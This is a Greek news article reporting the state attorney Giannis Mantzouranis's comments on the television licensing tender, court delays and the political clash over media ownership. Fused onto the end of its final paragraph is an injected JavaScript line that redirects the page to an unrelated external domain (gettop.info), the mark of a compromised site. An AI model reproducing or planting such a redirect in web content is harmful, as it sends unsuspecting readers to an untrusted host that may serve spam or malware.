Μαντζουράνης: Οι καναλάρχες έχουν στα χέρια τους ένα πυρηνικο όπλο

0
11

 

Ο έλεγχος για το πόθεν έσχες έχει πολλά στάδια, δήλωσε ο πληρεξούσιος δικηγόρος του Δημοσίου Γιάννης Μαντζουράνης, ο οποίος μίλησε στην ΕΡΤ για τη διαδικασία χορήγησης των τηλεοπτικών αδειών.

Όπως σημείωσε χαρακτηριστικα «ο διαγωνισμός για τις τηλεοπτικές άδειες, θα μπορούσε να ονομαστεί σπονδυλωτός, δηλαδή ελεγχόμενος σε κάθε στάδιο, για αυτό έχουμε και 80 αιτήσεις ακύρωσης».

Αφού ανέλυσε τα στάδια ελέγχου για τους οικονομικούς πόρους των αιτηθέντων για τηλεοπτική άδεια, ο κ. Μαντζουράνης είπε ότι το πόθεν έσχες λαμβάνει τελικό έλεγχο από την Επιτροπή του Διαγωνισμού σε συνεργασία με την Grand Thorton, γεγονός το οποίο ήταν πρόταση του Ευ. Βενιζέλου και έγινε δεκτή από τον υπουργό Επικρατείας Ν. Παππά, και υπογράμμισε ότι ο τελικός έλεγχος θα γίνει από την Αρχή ξεπλύματος μαύρου χρήματος και αν προκύψει παρατυπία χάνονται και χρήματα και η άδεια.

«Θεωρώ σκόπιμο», σημείωσε, «να υπάρξουν συνέργειες για να μην υπάρξουν απολυμένοι εργαζόμενοι, με σωστές συμβάσεις εργασίας όπως προβλέπει ο νέος νόμος, και όχι με μπλοκάκια».

Επίσης, δήλωσε ότι δεν είναι η πρώτη φορά που οι εργαζόμενοι χρησιμοποιούνται ως εργαλείο για την προάσπιση των συμφερόντων των εργοδοτών τους. «Δεν θα πρέπει να πέσουν σε αυτή την παγίδα οι εργαζόμενοι, οι οποίοι πρέπει να προστατευθούν και να απορροφηθούν από τα νέα κανάλια» υπογράμμισε ο Ι. Μαντζουράνης.

Εκτίμησε ότι οριστικό τοπίο θα έχουμε το αργότερο μέχρι τα μέσα του Νοέμβρη, όσον αφορά με τις νομικές εκκρεμότητες και την απόφαση του ΣτΕ. Από τη στιγμή που ο υπουργός Επικρατείας θα υπογράψει τις αποφάσεις για τις τέσσερις νέες τηλεοπτικές άδειες θα έχουμε οριστικό νέο τηλεοπτικό τοπίο, συμπλήρωσε.

Κλείνοντας υπογράμμισε ότι «δεν είναι η πρώτη φορά που γίνεται σύγκρουση πολιτικής και οικονομικής εξουσίας με εμπλοκή και της Δικαιοσύνης και που επιχειρείται να παρέμβει κάποιος στη Δικαιοσύνη, ωστόσο τώρα για πρώτη φορά άνθρωποι με τόση μεγάλη δύναμη επιτίθενται και κάνουν τα αδύνατα δυνατά για να προασπίσουν τα δικά τους οικονομικά συμφέροντα. Όμως η ανεξαρτησία της Δικαιοσύνης είναι ζητούμενο και στο τέλος θα κριθεί ο κάθε δικαστής και το κάθε δικαστήριο».

«Οι δικαστικές αποφάσεις δεν είναι πάντα αρεστές», τόνισε ο Ι. Μαντζουράνης, «αλλά είναι εφαρμοστέες και όλοι πρέπει να συμμορφώνονται με το περιεχόμενό τους, χωρίς ‘’αντάρτικα’’».

Σε δηλώσεις του στην ΕΡΤ ο πληρεξούσιος δικηγόρος του Δημοσίου Ι. Μαντζουράνης είπε ότι οι επιχειρηματίες της τηλεόρασης έχουν στα χέρια τους ένα «πυρηνικό όπλο», τα κανάλια τους, που έχουν τη δυνατότητα να διαμορφώνουν την κοινή γνώμη, συμπληρώνοντας ότι όλα τα κανάλια οφείλουν να υπηρετούν τον πλουραλισμό και όχι τη μονομέρεια καθώς εκμεταλλεύονται τόσα χρόνια ένα δημόσιο αγαθό (σ.σ. τις συχνότητες) τη στιγμή που επί 27 χρόνια «είχαμε 13 νόμους να νομιμοποιούν την παρανομία».

Σχολιάζοντας την απόφαση αναβολής της διάσκεψης του ΣτΕ, ο Ι. Μαντζουράνης σημείωσε ότι το γεγονός δεν είναι ούτε κάτι σπάνιο ούτε παράνομο, όπως παρουσιάζεται σε συγκεκριμένη μερίδα του Τύπου καθώς και στα κανάλια.

Ο δικαστής, σημείωσε ο Ι. Μαντζουράνης, οφείλει να λαμβάνει υπόψιν του το κοινό περί Δικαίου αίσθημα. Σχολιάζοντας τέλος, τις δηλώσεις Ευ. Βενιζέλου για τη στάση της ηγεσίας της Δικαιοσύνης με κατηγορίες περί συναλλαγής, ο Ι. Μαντζουράνης είπε ότι ο κ. Βενιζέλος έχει δύο ‘’καπέλα’’ ένα του καθηγητή του συνταγματικού δικαίου και ένα του πολιτικού, και χρησιμοποιεί όποτε τον βολεύει είτε το ένα, είτε το άλλο. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here